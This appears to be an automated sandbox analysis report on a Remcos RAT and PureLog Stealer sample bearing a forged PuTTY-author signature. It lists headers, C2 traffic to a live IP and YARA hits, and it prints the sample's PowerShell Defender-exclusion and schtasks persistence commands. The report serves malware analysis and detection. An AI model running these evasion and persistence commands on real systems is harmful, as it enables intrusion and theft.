                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x8B52382E [Tue Jan 26 11:42:38 2044 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Authenticode Signature

                                                                                        Signature Valid:false
                                                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                        Error Number:-2146869232
                                                                                        Not Before, Not After
                                                                                        • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                        Subject Chain
                                                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                        Version:3
                                                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                        Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xeda670x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x628.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xec8000x3608
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xeb0180x70.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000xebac00xebc0028d849b38df00cd2a3c34c7664db9ad0False0.9610959454533404OpenPGP Public Key7.959401786554723IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xee0000x6280x800818a7059877e8a25a9f8ffe45fa4d614False0.33984375data3.4743788955958435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xf00000xc0x2004a1db7927a42c1653a1714cc02821721False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0xee0900x398OpenPGP Public Key0.42282608695652174
                                                                                        RT_MANIFEST0xee4380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-08T09:04:13.806353+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.44973741.216.183.2387112TCP
                                                                                        2024-12-08T09:04:16.575929+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449738178.237.33.5080TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 8, 2024 09:04:12.293368101 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:12.415834904 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:12.415935040 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:12.430011988 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:12.550755978 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:13.763019085 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:13.806353092 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:14.002053022 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:14.006853104 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:14.127255917 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:14.127337933 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:14.246711969 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:14.759079933 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:14.762331009 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:14.882203102 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:14.951006889 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:15.003310919 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:15.212419987 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:04:15.332096100 CET8049738178.237.33.50192.168.2.4
                                                                                        Dec 8, 2024 09:04:15.332180023 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:04:15.332479000 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:04:15.451879978 CET8049738178.237.33.50192.168.2.4
                                                                                        Dec 8, 2024 09:04:16.574131966 CET8049738178.237.33.50192.168.2.4
                                                                                        Dec 8, 2024 09:04:16.575928926 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:04:16.618067980 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:16.737449884 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:17.573510885 CET8049738178.237.33.50192.168.2.4
                                                                                        Dec 8, 2024 09:04:17.573622942 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:04:45.083527088 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:04:45.131937027 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:04:45.251285076 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:05:15.385699987 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:05:15.431586981 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:05:15.609720945 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:05:15.728981018 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:05:45.739732981 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:05:45.742008924 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:05:45.861308098 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:06:05.025604010 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:06:05.369261980 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:06:06.057046890 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:06:07.431725025 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:06:10.181809902 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:06:15.666146994 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:06:16.099191904 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:06:16.101653099 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:06:16.221074104 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:06:26.619292021 CET4973880192.168.2.4178.237.33.50
                                                                                        Dec 8, 2024 09:06:46.442889929 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:06:46.447688103 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:06:46.566988945 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:16.817569971 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:16.819611073 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:07:16.938889027 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:47.240397930 CET71124973741.216.183.238192.168.2.4
                                                                                        Dec 8, 2024 09:07:47.245116949 CET497377112192.168.2.441.216.183.238
                                                                                        Dec 8, 2024 09:07:47.364563942 CET71124973741.216.183.238192.168.2.4

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 8, 2024 09:04:15.063306093 CET5659853192.168.2.41.1.1.1
                                                                                        Dec 8, 2024 09:04:15.204503059 CET53565981.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 8, 2024 09:04:15.063306093 CET192.168.2.41.1.1.10xfffdStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 8, 2024 09:04:15.204503059 CET1.1.1.1192.168.2.40xfffdNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • geoplugin.net

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449738178.237.33.50807952C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 8, 2024 09:04:15.332479000 CET71OUTGET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
                                                                                        Dec 8, 2024 09:04:16.574131966 CET1171INHTTP/1.1 200 OK
                                                                                        date: Sun, 08 Dec 2024 08:04:16 GMT
                                                                                        server: Apache
                                                                                        content-length: 963
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:03:04:02
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PEbZthAqV9.exe"
                                                                                        Imagebase:0x5d0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:03:04:09
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
                                                                                        Imagebase:0x960000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:03:04:09
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:03:04:09
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x960000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"
                                                                                        Imagebase:0xe10000
                                                                                        File size:187'904 bytes
                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PEbZthAqV9.exe"
                                                                                        Imagebase:0x9f0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:03:04:12
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Imagebase:0x7a0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 63%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:03:04:14
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                        Imagebase:0x7ff693ab0000
                                                                                        File size:496'640 bytes
                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:03:04:20
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"
                                                                                        Imagebase:0xe10000
                                                                                        File size:187'904 bytes
                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x1b0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x320000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x50000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x3a0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0xc90000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
